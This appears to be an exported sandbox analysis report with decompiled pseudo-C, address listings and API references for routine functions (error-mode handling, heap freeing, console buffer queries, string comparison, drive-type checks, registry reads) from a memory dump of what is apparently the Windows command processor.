                                    0x011e2d69
                                    0x011e2d6b
                                    0x011e2d6b
                                    0x011e2d6e
                                    0x011e2d6e
                                    0x011e2d71
                                    0x011e2d74
                                    0x011e2d80
                                    0x011ed93f
                                    0x00000000
                                    0x00000000
                                    0x011ed94e
                                    0x011ed953
                                    0x011ed955
                                    0x011ed958
                                    0x011ed958
                                    0x011ed95b
                                    0x011ed95e
                                    0x011ed965
                                    0x011ed96a
                                    0x011ed972
                                    0x011ed973
                                    0x011ed979
                                    0x011ed979
                                    0x011e2dc7
                                    0x011e2dcf
                                    0x011e2dcf
                                    0x011e2d86
                                    0x011e2d87
                                    0x011e2d91
                                    0x011e2d9f
                                    0x011e2dab
                                    0x011e2dae
                                    0x011e2db4
                                    0x011e2db9
                                    0x011ed983
                                    0x011ed98d
                                    0x011ed98f
                                    0x011ed98f
                                    0x00000000
                                    0x011e2db9

                                    APIs
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ErrorMode$FullNamePath
                                    • String ID:
                                    • API String ID: 268959451-0
                                    • Opcode ID: f3d49440b11c6ae843187889818cca761bb1577a1bf445bedffb8b356851c5b0
                                    • Instruction ID: 4966c4f414c69bd40c7ef73025f77b80acc0af26ced68ebd90731c41d3a9fc39
                                    • Opcode Fuzzy Hash: f3d49440b11c6ae843187889818cca761bb1577a1bf445bedffb8b356851c5b0
                                    • Instruction Fuzzy Hash: B4414639500501ABCF2CDFE8D8698BEB7EEFF88704714851DEA06C7244E771AA41C790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DEEF0, Relevance: 6.1, APIs: 4, Instructions: 94memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E011DEEF0(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				void* __ebx;
				intOrPtr _t8;
				signed int _t9;
				intOrPtr _t12;
				void* _t18;
				intOrPtr _t23;
				signed int _t25;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;
				intOrPtr* _t36;

				_t8 =  *0x1213cd8;
				_t34 = _a4;
				_t23 = __edx;
				_t33 = __ecx;
				 *0x120f980 = __ecx;
				if(_t8 <= _t34) {
					L4:
					_t35 = 0;
					_t9 = 0;
					_t25 = 0;
					do {
						if(_t9 >= 0 && _t25 < 2) {
							_t18 =  *(0x11fd5b8 + _t35 * 4);
							if(_t18 != 0) {
								VirtualFree(_t18, 0, 0x8000);
								 *(0x11fd5b8 + _t35 * 4) = 0;
							}
						}
						_t35 = _t35 + 1;
						_t9 = _t35;
						_t25 = _t9;
					} while (_t35 < 2);
					 *0x120b8ac = _t33;
					_push(0);
					_push(0x120b940);
					 *0x120b8a8 = _t23;
					 *0x1203892 = 0;
					 *0x120b8a4 = 0x1203892;
					 *0x120b8a0 = 0x1203892;
					L011E82C1();
					if(0 != 0) {
						return 0;
					}
					 *0x11fd558 = 0;
					 *0x11fd554 = 0;
					_t36 = E011DDC74(_t23, 0);
					if(_t36 == 0) {
						_t12 = 1;
					} else {
						if(E011DEEC8() != 0 && E011DF030(0) != 0xa &&  *0x120fa90 != 0) {
							E011F82EB(0);
						}
						_t12 = 0;
					}
					 *0x11fd5c8 = _t12;
					if( *0x120fa88 != 0) {
						E011F8121(_t36, 0);
					}
					return _t36;
				}
				while(1) {
					_t32 =  *0x1213cdc;
					if(_t32 == 0) {
						goto L4;
					}
					 *_t32 = 0;
					 *0x1213cdc =  *(_t32 + 4);
					 *0x1213cd8 = _t8 - 1;
					 *(_t32 + 4) = 0;
					RtlFreeHeap(GetProcessHeap(), 0, _t32);
					_t8 =  *0x1213cd8;
					if(_t8 > _t34) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}















                                    0x011deef5
                                    0x011deefc
                                    0x011deeff
                                    0x011def02
                                    0x011def04
                                    0x011def0c
                                    0x011def4f
                                    0x011def4f
                                    0x011def51
                                    0x011def53
                                    0x011def55
                                    0x011def57
                                    0x011def5e
                                    0x011def67
                                    0x011df00d
                                    0x011df013
                                    0x011df013
                                    0x011def67
                                    0x011def6d
                                    0x011def6e
                                    0x011def70
                                    0x011def72
                                    0x011def79
                                    0x011def7f
                                    0x011def80
                                    0x011def85
                                    0x011def8b
                                    0x011def91
                                    0x011def9b
                                    0x011defa5
                                    0x011defaf
                                    0x011deffb
                                    0x011deffb
                                    0x011defb3
                                    0x011defb8
                                    0x011defc2
                                    0x011defc6
                                    0x011deffe
                                    0x011defc8
                                    0x011defcf
                                    0x011ec117
                                    0x011ec117
                                    0x011defe1
                                    0x011defe1
                                    0x011defea
                                    0x011defef
                                    0x011ec125
                                    0x011ec125
                                    0x00000000
                                    0x011deff5
                                    0x011def10
                                    0x011def10
                                    0x011def18
                                    0x00000000
                                    0x00000000
                                    0x011def1f
                                    0x011def27
                                    0x011def2d
                                    0x011def32
                                    0x011def40
                                    0x011def46
                                    0x011def4d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011def4d
                                    0x00000000

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DEF39
                                    • RtlFreeHeap.NTDLL(00000000,?,011DE5F6), ref: 011DEF40
                                    • _setjmp3.MSVCRT ref: 011DEFA5
                                    • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,00000000,00008000,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DF00D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: FreeHeap$ProcessVirtual_setjmp3
                                    • String ID:
                                    • API String ID: 2613391085-0
                                    • Opcode ID: bec839cdf8302e77e33eeeb4fda6f59bf7eed430cf9b2d882cc8f4d348d48299
                                    • Instruction ID: 32d94aa905706fb3b5fd6c586a578578908704fa008467da15e92370d5f46cb2
                                    • Opcode Fuzzy Hash: bec839cdf8302e77e33eeeb4fda6f59bf7eed430cf9b2d882cc8f4d348d48299
                                    • Instruction Fuzzy Hash: 10319C716012119FEB3DEF6EB80C72A7AE5BB54B19F14416EE509CB285DB70D880CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F579A, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E011F579A(void* __ecx, void* __eflags) {
				char* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				signed int _t13;
				short _t21;
				char* _t25;
				int _t29;
				short* _t32;
				void* _t35;
				short* _t37;
				short* _t41;
				int _t46;

				_push(__ecx);
				_t7 = E011E7797(__ecx);
				if(_t7 != 0) {
					_t7 =  *0x121c018(0, 0);
					if(0 != 0) {
						_t28 = 0;
						_t41 = E011E00B0(0);
						if(_t41 == 0) {
							L3:
							E011F9287(_t28);
							__imp__longjmp(0x120b8b8, 1);
						}
						_t28 = 0;
						_t25 = E011E00B0(0);
						_v8 = _t25;
						if(_t25 == 0) {
							goto L3;
						}
						if(E011E7797(0) != 0) {
							 *0x121c018(0, _t25);
						}
						_t29 =  *0x1203854;
						_t13 = E011E0638(_t29);
						asm("sbb eax, eax");
						MultiByteToWideChar(_t29,  ~( ~_t13), _t25, 0xffffffff, _t41, 0);
						_t46 = SetErrorMode(1);
						if( *_t41 != 0) {
							_t35 = 0;
							do {
								E011E33FC(0, _t41, _t35 + _t35, _t41, _t46, _t35 + _t35);
								_t32 = _t41;
								_t3 =  &(_t32[1]); // 0x2
								_t37 = _t3;
								do {
									_t21 =  *_t32;
									_t32 =  &(_t32[1]);
								} while (_t21 != 0);
								_t35 = 1;
								_t41 =  &(( &(_t41[_t32 - _t37 >> 1]))[1]);
							} while ( *_t41 != 0);
							_t25 = _v8;
						}
						SetErrorMode(_t46);
						_t7 = E011E0040(_t25);
					}
				}
				return _t7;
			}


















                                    0x011f579f
                                    0x011f57a3
                                    0x011f57aa
                                    0x011f57b4
                                    0x011f57be
                                    0x011f57c4
                                    0x011f57cc
                                    0x011f57d0
                                    0x011f57d2
                                    0x011f57d2
                                    0x011f57de
                                    0x011f57de
                                    0x011f57e4
                                    0x011f57eb
                                    0x011f57ed
                                    0x011f57f2
                                    0x00000000
                                    0x00000000
                                    0x011f57fb
                                    0x011f57ff
                                    0x011f57ff
                                    0x011f5805
                                    0x011f580b
                                    0x011f5816
                                    0x011f581d
                                    0x011f582b
                                    0x011f5832
                                    0x011f5834
                                    0x011f5838
                                    0x011f583c
                                    0x011f5841
                                    0x011f5843
                                    0x011f5843
                                    0x011f5846
                                    0x011f5846
                                    0x011f5849
                                    0x011f584c
                                    0x011f5857
                                    0x011f585b
                                    0x011f585e
                                    0x011f5863
                                    0x011f5863
                                    0x011f5867
                                    0x011f586f
                                    0x011f586f
                                    0x011f57be
                                    0x011f587a

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,011E3A4E,?,?,?,?,?,?,?,?), ref: 011F57DE
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F581D
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F5825
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F5867
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ErrorHeapMode$AllocByteCharMultiProcessWidelongjmp
                                    • String ID:
                                    • API String ID: 162963024-0
                                    • Opcode ID: 95fb2bb0f05b6380a9cc0043c9a2ff0d90be67f7e1d96659ec0edd1a89a86589
                                    • Instruction ID: 3470260970c4f6054cff1013fd6ad86558c2cb568a0ebd0c722e94788eab0564
                                    • Opcode Fuzzy Hash: 95fb2bb0f05b6380a9cc0043c9a2ff0d90be67f7e1d96659ec0edd1a89a86589
                                    • Instruction Fuzzy Hash: 53212C35700A029BD738EBB99C5C9BE775BDFD4254B19022CEE0687284DF718E4187A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E4E94, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 67%
                                    			E011E4E94(void*** __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t16;
				signed int _t17;
				void* _t21;
				void* _t22;
				void*** _t27;
				void* _t37;
				void* _t38;
				void** _t39;
				signed int _t40;

				_t37 = __edx;
				_t13 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t13 ^ _t40;
				_t27 = __ecx;
				_t29 = 0x2c;
				_t39 = E011E00B0(_t29);
				if(_t39 == 0) {
					L6:
					_t16 = E011F9287(_t29);
					__imp__longjmp(0x120b8b8, 1);
					L7:
					__imp___get_osfhandle(1);
					 *_t39 = _t16;
					_t17 = GetConsoleScreenBufferInfo(_t16,  &_v32);
					if(_t17 == 0) {
						 *_t39 =  *_t39 & _t17;
					}
					L2:
					if(GetConsoleScreenBufferInfo( *_t39,  &_v32) != 0) {
						_t38 = 0x2000;
						_t21 = _v32.dwSize + 2;
						if(_t21 >= 0x2000) {
							_t38 = _t21;
						}
					} else {
						_t38 = 0x2002;
					}
					_t29 = _t38 + _t38;
					_t22 = E011E00B0(_t38 + _t38);
					if(_t22 != 0) {
						_t39[4] = _t22;
						_t39[3] = _t38;
						_t39[5] = 0;
						_t39[2] = 0;
						_t39[1] = 0;
						_t39[9] = 0;
						E011E4F29(_t39);
						 *_t27 = _t39;
						return E011E6FD0(0, _t27, _v8 ^ _t40, _t37, _t38, _t39);
					}
					goto L6;
				}
				 *_t39 =  *_t39 & 0x00000000;
				_t16 = E011E0178(_t15);
				if(_t16 != 0) {
					goto L7;
				}
				goto L2;
			}


















                                    0x011e4e94
                                    0x011e4e9c
                                    0x011e4ea3
                                    0x011e4eab
                                    0x011e4ead
                                    0x011e4eb3
                                    0x011e4eb7
                                    0x011ef00a
                                    0x011ef00a
                                    0x011ef016
                                    0x011ef01c
                                    0x011ef01e
                                    0x011ef028
                                    0x011ef02c
                                    0x011ef034
                                    0x011ef03a
                                    0x011ef03a
                                    0x011e4ed0
                                    0x011e4ede
                                    0x011ef045
                                    0x011ef04a
                                    0x011ef04f
                                    0x011ef055
                                    0x011ef055
                                    0x011e4ee4
                                    0x011e4ee4
                                    0x011e4ee4
                                    0x011e4ee9
                                    0x011e4eec
                                    0x011e4ef3
                                    0x011e4ef9
                                    0x011e4f00
                                    0x011e4f03
                                    0x011e4f06
                                    0x011e4f09
                                    0x011e4f0c
                                    0x011e4f0f
                                    0x011e4f1a
                                    0x011e4f28
                                    0x011e4f28
                                    0x00000000
                                    0x011e4ef3
                                    0x011e4ebd
                                    0x011e4ec3
                                    0x011e4eca
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011E4ED6
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,00000104,00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011EF016
                                    • _get_osfhandle.MSVCRT ref: 011EF01E
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011EF02C
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: BufferConsoleHeapInfoScreen_get_osfhandle$AllocFileProcessTypelongjmp
                                    • String ID:
                                    • API String ID: 1629431960-0
                                    • Opcode ID: 09e3627f18f4539bf6f7a05dd47c1a1860e7fe36fec9737f7a8998d7cf064fbe
                                    • Instruction ID: 2e8e8ef8b68457230fb79b11b6cbd85ca4eb97679f866bedc89ea06818a08adb
                                    • Opcode Fuzzy Hash: 09e3627f18f4539bf6f7a05dd47c1a1860e7fe36fec9737f7a8998d7cf064fbe
                                    • Instruction Fuzzy Hash: 0321F571A00B069FE7389FB4E44CB7ABBE5EF24715F04082EE846C6140EB75D801CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DAEB0, Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 43%
                                    			E011DAEB0(void* __ecx, intOrPtr _a4) {
				wchar_t* _v8;
				wchar_t* _v12;
				long _t25;
				signed int _t26;
				void* _t28;
				signed int _t30;
				void* _t31;
				void* _t33;
				void* _t34;
				signed int _t36;
				intOrPtr _t45;
				long _t48;
				signed int _t49;

				_t45 = _a4;
				_t48 = wcstol( *(_t45 + 0x38),  &_v8, 0);
				_t25 = wcstol( *(_t45 + 0x3c),  &_v12, 0);
				if( *_v8 != 0 ||  *_v12 != 0) {
					_push( *(_t45 + 0x3c));
					_push( *(_t45 + 0x38));
					if(( *(_t45 + 0x40) & 0x00000002) != 0) {
						_t26 = lstrcmpiW();
					} else {
						_t26 = lstrcmpW();
					}
					_t49 = _t26;
					goto L3;
				} else {
					_t49 = _t48 - _t25;
					L3:
					_t28 =  *((intOrPtr*)(_t45 + 0x44)) - 1;
					if(_t28 == 0) {
						_t30 = 0 | _t49 == 0x00000000;
						L9:
						return _t30;
					}
					_t31 = _t28 - 1;
					if(_t31 == 0) {
						_t30 = 0 | _t49 != 0x00000000;
						goto L9;
					}
					_t33 = _t31 - 1;
					if(_t33 == 0) {
						L14:
						_t30 = _t49 >> 0x1f;
						goto L9;
					}
					_t34 = _t33 - 1;
					if(_t34 == 0) {
						_t30 = 0 | _t49 <= 0x00000000;
						goto L9;
					}
					_t36 = _t34 - 1;
					if(_t36 != 0) {
						if(_t36 != 1) {
							_t30 = 0;
							goto L9;
						}
						_t49 =  !_t49;
						goto L14;
					}
					_t30 = _t36 & 0xffffff00 | _t49 > 0x00000000;
					goto L9;
				}
			}
















                                    0x011daeba
                                    0x011daecd
                                    0x011daed7
                                    0x011daee6
                                    0x011daf49
                                    0x011daf4c
                                    0x011daf4f
                                    0x011daf5b
                                    0x011daf51
                                    0x011daf51
                                    0x011daf51
                                    0x011daf57
                                    0x00000000
                                    0x011daef0
                                    0x011daef0
                                    0x011daef2
                                    0x011daef5
                                    0x011daef8
                                    0x011daf20
                                    0x011daf13
                                    0x011daf19
                                    0x011daf19
                                    0x011daefa
                                    0x011daefd
                                    0x011daf29
                                    0x00000000
                                    0x011daf29
                                    0x011daeff
                                    0x011daf02
                                    0x011daf35
                                    0x011daf38
                                    0x00000000
                                    0x011daf38
                                    0x011daf04
                                    0x011daf07
                                    0x011daf40
                                    0x00000000
                                    0x011daf40
                                    0x011daf09
                                    0x011daf0c
                                    0x011daf31
                                    0x011daf63
                                    0x00000000
                                    0x011daf63
                                    0x011daf33
                                    0x00000000
                                    0x011daf33
                                    0x011daf10
                                    0x00000000
                                    0x011daf10

                                    APIs
                                    • wcstol.MSVCRT ref: 011DAEC7
                                    • wcstol.MSVCRT ref: 011DAED7
                                    • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 011DAF51
                                    • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 011DAF5B
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcstol$lstrcmplstrcmpi
                                    • String ID:
                                    • API String ID: 4273384694-0
                                    • Opcode ID: 65c62201fb017387a4d3b455d680fab5252e61a9b53894a2ef43e8d82d4f4729
                                    • Instruction ID: c35f12d9e28c13a1475bf28ff1810d70f98651d886688a9cd6f5d20969a42f23
                                    • Opcode Fuzzy Hash: 65c62201fb017387a4d3b455d680fab5252e61a9b53894a2ef43e8d82d4f4729
                                    • Instruction Fuzzy Hash: A511A5B2900526AB8B6DDE7CFA5C8797B68FF0125470603D0E901D79C4D725ED60C6D2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F997C, Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 79%
                                    			E011F997C(WCHAR* __ecx, void* __edi) {
				signed int _v8;
				long _v20;
				char _v24;
				signed int _v28;
				void _v548;
				WCHAR* _v552;
				void* __ebx;
				void* __esi;
				signed int _t24;
				WCHAR* _t37;
				long _t38;
				void* _t39;
				WCHAR* _t40;
				char _t43;
				void* _t51;
				void* _t52;
				WCHAR* _t53;
				signed int _t54;

				_t52 = __edi;
				_t24 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t24 ^ _t54;
				_v552 = _v552 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v20 = 0x104;
				_t43 = 1;
				_t53 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L10:
					_t43 = 0;
				} else {
					_t37 = _v28;
					if(_t37 == 0) {
						_t37 =  &_v548;
					}
					_t38 = GetFullPathNameW(_t53, _v20, _t37,  &_v552);
					if(_t38 == 0 || _t38 <= 0xffce) {
						goto L10;
					} else {
						_t39 = _v28;
						if(_t39 == 0) {
							_t39 =  &_v548;
						}
						 *((short*)(_t39 + 6)) = 0;
						_t40 = _v28;
						if(_t40 == 0) {
							_t40 =  &_v548;
						}
						if(GetDriveTypeW(_t40) != 4) {
							goto L10;
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t43, _t43, _v8 ^ _t54, _t51, _t52, _t53, _v28);
			}





















                                    0x011f997c
                                    0x011f9987
                                    0x011f998e
                                    0x011f9991
                                    0x011f999d
                                    0x011f99a4
                                    0x011f99af
                                    0x011f99b3
                                    0x011f99b5
                                    0x011f99b8
                                    0x011f99e1
                                    0x011f9a39
                                    0x011f9a39
                                    0x011f99e3
                                    0x011f99e3
                                    0x011f99e8
                                    0x011f99ea
                                    0x011f99ea
                                    0x011f99fc
                                    0x011f9a04
                                    0x00000000
                                    0x011f9a0d
                                    0x011f9a0d
                                    0x011f9a12
                                    0x011f9a14
                                    0x011f9a14
                                    0x011f9a1c
                                    0x011f9a20
                                    0x011f9a25
                                    0x011f9a27
                                    0x011f9a27
                                    0x011f9a37
                                    0x00000000
                                    0x00000000
                                    0x011f9a37
                                    0x011f9a04
                                    0x011f9a3e
                                    0x011f9a56

                                    APIs
                                    • memset.MSVCRT ref: 011F99B8
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(004D0043,-00000209,00000000,00000000,-00000209,?,011D2178,00310030), ref: 011F99FC
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D2178,00310030), ref: 011F9A2E
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9A3E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$DriveFullNamePathType
                                    • String ID:
                                    • API String ID: 3442494845-0
                                    • Opcode ID: 4a1655012cdb268907ade88d973b4a9eb78a32a82459891be4ad02e9f32c4f3f
                                    • Instruction ID: 71ba0e9fa0b896792e1cd5a68a757bbc540353d7ae598a7f4be2f3a570a5bef6
                                    • Opcode Fuzzy Hash: 4a1655012cdb268907ade88d973b4a9eb78a32a82459891be4ad02e9f32c4f3f
                                    • Instruction Fuzzy Hash: 26213571A0011E9BDF25DFE8EC89BBE77B8EB14308F0401A9A605E2141E775DA448B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F5662, Relevance: 6.1, APIs: 4, Instructions: 75registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 79%
                                    			E011F5662(void* __ebx, void* __ecx, short* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t21;
				long _t34;
				void* _t44;

				_push(0x1c);
				_push(0x11fc100);
				E011E7678(__ebx, __edi, __esi);
				_t41 = __ecx;
				 *((intOrPtr*)(_t44 - 0x2c)) = __ecx;
				_t43 = 0;
				 *(_t44 - 0x20) = 0;
				 *(_t44 - 0x24) = 0;
				 *(_t44 - 0x1c) = __ecx;
				 *((intOrPtr*)(_t44 - 4)) = 0;
				if(__edx == 0 ||  *__edx == 0) {
					L4:
					_t21 = RegQueryValueExW( *(_t44 - 0x1c), 0, 0, _t44 - 0x28, 0, _t44 - 0x24);
					if(_t21 != 2) {
						if(_t21 != 0) {
							goto L3;
						} else {
							_t43 = E011E00B0( *(_t44 - 0x24));
							 *(_t44 - 0x20) = _t43;
							if(_t43 == 0) {
								_push(8);
								goto L11;
							} else {
								_t34 = RegQueryValueExW( *(_t44 - 0x1c), 0, 0, _t44 - 0x28, _t43, _t44 - 0x24);
								if(_t34 != 0) {
									E011E0040(_t43);
									_t43 = 0;
									 *(_t44 - 0x20) = 0;
									_push(_t34);
									goto L11;
								}
							}
						}
					} else {
						_t43 = E011DDF40(0x11d24ac);
						 *(_t44 - 0x20) = _t30;
					}
				} else {
					_t21 = RegOpenKeyExW(__ecx, __edx, 0, 1, _t44 - 0x1c);
					if(_t21 == 0) {
						goto L4;
					} else {
						L3:
						_push(_t21);
						L11:
						SetLastError();
					}
				}
				 *((intOrPtr*)(_t44 - 4)) = 0xfffffffe;
				E011F572C(_t41);
				return E011E76BD(_t43);
			}






                                    0x011f5662
                                    0x011f5664
                                    0x011f5669
                                    0x011f566e
                                    0x011f5670
                                    0x011f5675
                                    0x011f5677
                                    0x011f567a
                                    0x011f567d
                                    0x011f5680
                                    0x011f5685
                                    0x011f56a2
                                    0x011f56b0
                                    0x011f56b9
                                    0x011f56ce
                                    0x00000000
                                    0x011f56d0
                                    0x011f56d8
                                    0x011f56da
                                    0x011f56df
                                    0x011f570a
                                    0x00000000
                                    0x011f56e1
                                    0x011f56f5
                                    0x011f56f9
                                    0x011f56fd
                                    0x011f5702
                                    0x011f5704
                                    0x011f5707
                                    0x00000000
                                    0x011f5707
                                    0x011f56f9
                                    0x011f56df
                                    0x011f56bb
                                    0x011f56c5
                                    0x011f56c7
                                    0x011f56c7
                                    0x011f568c
                                    0x011f5695
                                    0x011f569d
                                    0x00000000
                                    0x011f569f
                                    0x011f569f
                                    0x011f569f
                                    0x011f570c
                                    0x011f570c
                                    0x011f570c
                                    0x011f569d
                                    0x011f5712
                                    0x011f5719
                                    0x011f5725

                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,011FC100,0000001C,011F4C85), ref: 011F5695
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,011FC100,0000001C,011F4C85), ref: 011F56B0
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 011F56EF
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F570C
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
